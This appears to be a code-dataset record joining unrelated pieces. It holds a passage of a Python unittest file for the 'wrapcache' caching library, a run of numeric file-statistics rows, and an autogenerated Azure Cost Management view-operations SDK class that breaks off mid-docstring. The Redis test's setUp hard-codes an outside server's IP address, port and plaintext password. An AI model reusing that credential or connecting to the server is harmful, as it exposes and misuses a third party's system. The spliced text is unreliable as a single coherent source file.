val_1 = self.test_class.test_input_cache(1, 'hello world')
self.assertEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), self.test_class.test_input_cache(2, 'hello world'), 'test_input_cache fail')
def test_input_order_cache(self):
val_1 = self.test_class.test_input_order_cache(i = 1, j = 'hello world')
self.assertNotEqual(self.test_class.test_input_order_cache(j = 'hello world', i = 1), self.test_class.test_input_order_cache(j = 'hello wrapcache', i = 1), 'test_input_order_cache fail')
def test_keyof_api(self):
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_2 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_3 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello world', i = 1)
key_4 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello wrapcache', i = 1)
self.assertEqual(key_1, key_2, 'test_keyof_api fail')
self.assertEqual(key_1, key_3, 'test_keyof_api fail')
self.assertNotEqual(key_1, key_4, 'test_keyof_api fail')
def test_apis(self):
#get api
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
value_1 = wrapcache.get(key_1)
if not value_1:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#set api
value_2 = wrapcache.set(key_1, 'test_value', timeout = 3)
self.assertEqual(value_2, 'test_value', 'test_keyof_api fail')
#get api / timeout
value_3 = wrapcache.get(key_1)
self.assertEqual(value_3, 'test_value', 'test_keyof_api fail')
time.sleep(3)
value_3 = wrapcache.get(key_1)
if not value_3:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#remove api
value_4 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_4, 'test_value 4', 'test_keyof_api fail')
value_5 = wrapcache.remove(key_1)
self.assertEqual(value_4, value_5, 'test_keyof_api fail')
value_3 = wrapcache.get(key_1)
if not value_5:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#flush api
value_6 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_6, 'test_value 4', 'test_keyof_api fail')
self.assertTrue(wrapcache.flush(), 'test_keyof_api fail')
value_6 = wrapcache.get(key_1)
if not value_6:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
def test_need_cache_function(self):
for i in range(10):
time.sleep(1)
print(self.test_class.need_cache_function())
class TestMemoryLRUUnitest(unittest.TestCase):
def setUp(self):
self.test_class = TestMemoryInstance()
MemoryAdapter.db = LruCacheDB(size = 100)
def tearDown(self):
pass
def test_cache(self):
val_1 = self.test_class.test_cache()
self.assertEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
def test_input_cache(self):
val_1 = self.test_class.test_input_cache(1, 'hello world')
self.assertEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), self.test_class.test_input_cache(2, 'hello world'), 'test_input_cache fail')
def test_input_order_cache(self):
val_1 = self.test_class.test_input_order_cache(i = 1, j = 'hello world')
self.assertNotEqual(self.test_class.test_input_order_cache(j = 'hello world', i = 1), self.test_class.test_input_order_cache(j = 'hello wrapcache', i = 1), 'test_input_order_cache fail')
def test_keyof_api(self):
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_2 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_3 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello world', i = 1)
key_4 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello wrapcache', i = 1)
self.assertEqual(key_1, key_2, 'test_keyof_api fail')
self.assertEqual(key_1, key_3, 'test_keyof_api fail')
self.assertNotEqual(key_1, key_4, 'test_keyof_api fail')
def test_apis(self):
#get api
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
value_1 = wrapcache.get(key_1)
if not value_1:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#set api
value_2 = wrapcache.set(key_1, 'test_value', timeout = 3)
self.assertEqual(value_2, 'test_value', 'test_keyof_api fail')
#get api / timeout
value_3 = wrapcache.get(key_1)
self.assertEqual(value_3, 'test_value', 'test_keyof_api fail')
time.sleep(3)
value_3 = wrapcache.get(key_1)
if not value_3:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#remove api
value_4 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_4, 'test_value 4', 'test_keyof_api fail')
value_5 = wrapcache.remove(key_1)
self.assertEqual(value_4, value_5, 'test_keyof_api fail')
value_3 = wrapcache.get(key_1)
if not value_5:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#flush api
value_6 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_6, 'test_value 4', 'test_keyof_api fail')
self.assertTrue(wrapcache.flush(), 'test_keyof_api fail')
value_6 = wrapcache.get(key_1)
if not value_6:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
def test_need_cache_function(self):
for i in range(10):
time.sleep(1)
print(self.test_class.need_cache_function())
################end memory test
#########################redis test
class TestRedisInstance:
@wrapcache.wrapcache(timeout = 3, adapter = RedisAdapter)
def test_cache(self):
return time.time()
@wrapcache.wrapcache(timeout = 3, adapter = RedisAdapter)
def test_input_cache(self, i, j):
return (time.time() + i, j)
@wrapcache.wrapcache(timeout = 10, adapter = RedisAdapter)
def test_input_order_cache(self, i = 1, j = 's'):
return (time.time() + i, j)
@wrapcache.wrapcache(timeout = 3, adapter = RedisAdapter)
def need_cache_function(self):
time.sleep(2)
print('cache timeout, new...')
return random.randint(1, 100)
class TestRedisUnitest(unittest.TestCase):
def setUp(self):
self.test_class = TestRedisInstance()
import redis
#init redis instance
REDIS_CACHE_POOL = redis.ConnectionPool(host = '162.211.225.209', port = 6739, password = 'wzwacxl', db = 2)
REDIS_CACHE_INST = redis.Redis(connection_pool = REDIS_CACHE_POOL, charset = 'utf8')
RedisAdapter.db = REDIS_CACHE_INST #初始化装饰器缓存
def tearDown(self):
pass
def test_cache(self):
val_1 = self.test_class.test_cache()
self.assertEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_cache(), val_1, 'test_cache fail')
def test_input_cache(self):
val_1 = self.test_class.test_input_cache(1, 'hello world')
self.assertEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
time.sleep(5)
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), val_1, 'test_input_cache fail')
self.assertNotEqual(self.test_class.test_input_cache(1, 'hello world'), self.test_class.test_input_cache(2, 'hello world'), 'test_input_cache fail')
def test_input_order_cache(self):
val_1 = self.test_class.test_input_order_cache(i = 1, j = 'hello world')
self.assertNotEqual(self.test_class.test_input_order_cache(j = 'hello world', i = 1), self.test_class.test_input_order_cache(j = 'hello wrapcache', i = 1), 'test_input_order_cache fail')
def test_keyof_api(self):
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_2 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
key_3 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello world', i = 1)
key_4 = wrapcache.keyof(self.test_class.test_input_cache, j = 'hello wrapcache', i = 1)
self.assertEqual(key_1, key_2, 'test_keyof_api fail')
self.assertEqual(key_1, key_3, 'test_keyof_api fail')
self.assertNotEqual(key_1, key_4, 'test_keyof_api fail')
def test_apis(self):
#get api
key_1 = wrapcache.keyof(self.test_class.test_input_cache, i = 1, j = 'hello world')
value_1 = wrapcache.get(key_1)
if not value_1:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#set api
value_2 = wrapcache.set(key_1, 'test_value', timeout = 3)
self.assertEqual(value_2, 'test_value', 'test_keyof_api fail')
#get api / timeout
value_3 = wrapcache.get(key_1)
self.assertEqual(value_3, 'test_value', 'test_keyof_api fail')
time.sleep(3)
value_3 = wrapcache.get(key_1)
if not value_3:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#remove api
value_4 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_4, 'test_value 4', 'test_keyof_api fail')
value_5 = wrapcache.remove(key_1)
self.assertEqual(value_4, value_5, 'test_keyof_api fail')
value_3 = wrapcache.get(key_1)
if not value_5:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
#flush api
value_6 = wrapcache.set(key_1, 'test_value 4', timeout = 3)
self.assertEqual(value_6, 'test_value 4', 'test_keyof_api fail')
self.assertTrue(wrapcache.flush(), 'test_keyof_api fail')
value_6 = wrapcache.get(key_1)
if not value_6:
keyNone = True
self.assertEqual(keyNone, True, 'test_apis fail')
def test_need_cache_function(self):
for i in range(10):
time.sleep(1)
print(self.test_class.need_cache_function())
################end memory test
if __name__ =='__main__':
unittest.main()
| 41.903974
| 194
| 0.653418
| 1,771
| 12,655
| 4.396386
| 0.055336
| 0.070511
| 0.090162
| 0.104803
| 0.923966
| 0.920755
| 0.920755
| 0.917544
| 0.89738
| 0.882225
| 0
| 0.02662
| 0.22821
| 12,655
| 302
| 195
| 41.903974
| 0.770554
| 0.019597
| 0
| 0.90708
| 0
| 0
| 0.146734
| 0.005362
| 0
| 0
| 0
| 0
| 0.252212
| 1
| 0.141593
| false
| 0.017699
| 0.030973
| 0.026549
| 0.230089
| 0.022124
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bf08f8e37e370304ef6370c0f8c39be1cc1154d6
| 34,516
|
py
|
Python
|
src/costmanagement/azext_costmanagement/vendored_sdks/costmanagement/operations/_view_operations.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/costmanagement/azext_costmanagement/vendored_sdks/costmanagement/operations/_view_operations.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/costmanagement/azext_costmanagement/vendored_sdks/costmanagement/operations/_view_operations.py
|
Mannan2812/azure-cli-extensions
|
e2b34efe23795f6db9c59100534a40f0813c3d95
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ViewOperations(object):
"""ViewOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.costmanagement.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
**kwargs # type: Any
):
# type: (...) -> "models.ViewListResult"
"""Lists all views by tenant and object.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ViewListResult or the result of cls(response)
:rtype: ~azure.mgmt.costmanagement.models.ViewListResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ViewListResult"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url']
else:
url = next_link
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ViewListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/providers/Microsoft.CostManagement/views'}
def list_by_scope(
self,
scope, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.ViewListResult"
"""Lists all views at the given scope.
:param scope: The scope associated with view operations. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
External Billing Account scope and
'providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
External Subscription scope.
:type scope: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ViewListResult or the result of cls(response)
:rtype: ~azure.mgmt.costmanagement.models.ViewListResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ViewListResult"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_by_scope.metadata['url']
path_format_arguments = {
'scope': self._serialize.url("scope", scope, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
else:
url = next_link
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ViewListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_scope.metadata = {'url': '/{scope}/providers/Microsoft.CostManagement/views'}
def get(
self,
view_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.View"
"""Gets the view by view name.
:param view_name: View name.
:type view_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: View or the result of cls(response)
:rtype: ~azure.mgmt.costmanagement.models.View
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.View"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('View', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/providers/Microsoft.CostManagement/views/{viewName}'}
def create_or_update(
self,
view_name, # type: str
e_tag=None, # type: Optional[str]
display_name=None, # type: Optional[str]
scope=None, # type: Optional[str]
chart=None, # type: Optional[Union[str, "models.ChartType"]]
accumulated=None, # type: Optional[Union[str, "models.AccumulatedType"]]
metric=None, # type: Optional[Union[str, "models.MetricType"]]
kpis=None, # type: Optional[List["KpiProperties"]]
pivots=None, # type: Optional[List["PivotProperties"]]
timeframe=None, # type: Optional[Union[str, "models.ReportTimeframeType"]]
time_period=None, # type: Optional["models.ReportConfigTimePeriod"]
dataset=None, # type: Optional["models.ReportConfigDataset"]
**kwargs # type: Any
):
# type: (...) -> "models.View"
"""The operation to create or update a view. Update operation requires latest eTag to be set in the request. You may obtain the latest eTag by performing a get operation. Create operation does not require eTag.
:param view_name: View name.
:type view_name: str
:param e_tag: eTag of the resource. To handle concurrent update scenario, this field will be
used to determine whether the user is updating the latest version or not.
:type e_tag: str
:param display_name: User input name of the view. Required.
:type display_name: str
:param scope: Cost Management scope to save the view on. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'/providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
ExternalBillingAccount scope, and
'/providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
ExternalSubscription scope.
:type scope: str
:param chart: Chart type of the main view in Cost Analysis. Required.
:type chart: str or ~azure.mgmt.costmanagement.models.ChartType
:param accumulated: Show costs accumulated over time.
:type accumulated: str or ~azure.mgmt.costmanagement.models.AccumulatedType
:param metric: Metric to use when displaying costs.
:type metric: str or ~azure.mgmt.costmanagement.models.MetricType
:param kpis: List of KPIs to show in Cost Analysis UI.
:type kpis: list[~azure.mgmt.costmanagement.models.KpiProperties]
:param pivots: Configuration of 3 sub-views in the Cost Analysis UI.
:type pivots: list[~azure.mgmt.costmanagement.models.PivotProperties]
:param timeframe: The time frame for pulling data for the report. If custom, then a specific
time period must be provided.
:type timeframe: str or ~azure.mgmt.costmanagement.models.ReportTimeframeType
:param time_period: Has time period for pulling data for the report.
:type time_period: ~azure.mgmt.costmanagement.models.ReportConfigTimePeriod
:param dataset: Has definition for data in this report config.
:type dataset: ~azure.mgmt.costmanagement.models.ReportConfigDataset
:keyword callable cls: A custom type or function that will be passed the direct response
:return: View or the result of cls(response)
:rtype: ~azure.mgmt.costmanagement.models.View or ~azure.mgmt.costmanagement.models.View
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.View"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
_parameters = models.View(e_tag=e_tag, display_name=display_name, scope=scope, chart=chart, accumulated=accumulated, metric=metric, kpis=kpis, pivots=pivots, timeframe=timeframe, time_period=time_period, dataset=dataset)
api_version = "2019-11-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.create_or_update.metadata['url']
path_format_arguments = {
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = 'application/json'
# Construct and send request
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(_parameters, 'View')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('View', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('View', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/providers/Microsoft.CostManagement/views/{viewName}'}
def delete(
self,
view_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""The operation to delete a view.
:param view_name: View name.
:type view_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/providers/Microsoft.CostManagement/views/{viewName}'}
def get_by_scope(
self,
scope, # type: str
view_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.View"
"""Gets the view for the defined scope by view name.
:param scope: The scope associated with view operations. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
External Billing Account scope and
'providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
External Subscription scope.
:type scope: str
:param view_name: View name.
:type view_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: View or the result of cls(response)
:rtype: ~azure.mgmt.costmanagement.models.View
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.View"]
error_map = kwargs.pop('error_map', {404: ResourceNotFoundError, 409: ResourceExistsError})
api_version = "2019-11-01"
# Construct URL
url = self.get_by_scope.metadata['url']
path_format_arguments = {
'scope': self._serialize.url("scope", scope, 'str'),
'viewName': self._serialize.url("view_name", view_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('View', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_scope.metadata = {'url': '/{scope}/providers/Microsoft.CostManagement/views/{viewName}'}
def create_or_update_by_scope(
self,
scope, # type: str
view_name, # type: str
e_tag=None, # type: Optional[str]
display_name=None, # type: Optional[str]
view_properties_scope=None, # type: Optional[str]
chart=None, # type: Optional[Union[str, "models.ChartType"]]
accumulated=None, # type: Optional[Union[str, "models.AccumulatedType"]]
metric=None, # type: Optional[Union[str, "models.MetricType"]]
kpis=None, # type: Optional[List["KpiProperties"]]
pivots=None, # type: Optional[List["PivotProperties"]]
timeframe=None, # type: Optional[Union[str, "models.ReportTimeframeType"]]
time_period=None, # type: Optional["models.ReportConfigTimePeriod"]
dataset=None, # type: Optional["models.ReportConfigDataset"]
**kwargs # type: Any
):
# type: (...) -> "models.View"
"""The operation to create or update a view. Update operation requires latest eTag to be set in the request. You may obtain the latest eTag by performing a get operation. Create operation does not require eTag.
:param scope: The scope associated with view operations. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
External Billing Account scope and
'providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
External Subscription scope.
:type scope: str
:param view_name: View name.
:type view_name: str
:param e_tag: eTag of the resource. To handle concurrent update scenario, this field will be
used to determine whether the user is updating the latest version or not.
:type e_tag: str
:param display_name: User input name of the view. Required.
:type display_name: str
:param view_properties_scope: Cost Management scope to save the view on. This includes
'subscriptions/{subscriptionId}' for subscription scope,
'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}' for resourceGroup scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}' for Billing Account scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/departments/{departmentId}' for
Department scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/enrollmentAccounts/{enrollmentAccountId}'
for EnrollmentAccount scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/billingProfiles/{billingProfileId}'
for BillingProfile scope,
'providers/Microsoft.Billing/billingAccounts/{billingAccountId}/invoiceSections/{invoiceSectionId}'
for InvoiceSection scope, 'providers/Microsoft.Management/managementGroups/{managementGroupId}'
for Management Group scope,
'/providers/Microsoft.CostManagement/externalBillingAccounts/{externalBillingAccountName}' for
ExternalBillingAccount scope, and
'/providers/Microsoft.CostManagement/externalSubscriptions/{externalSubscriptionName}' for
ExternalSubscription scope.
:type view_properties_scope: str
:param chart: Chart type of the main view in Cost Analysis. Required.
:type chart: str or ~azure.mgmt.costmanagement.models.ChartType
:param accumulated: Show costs accumulated over time.
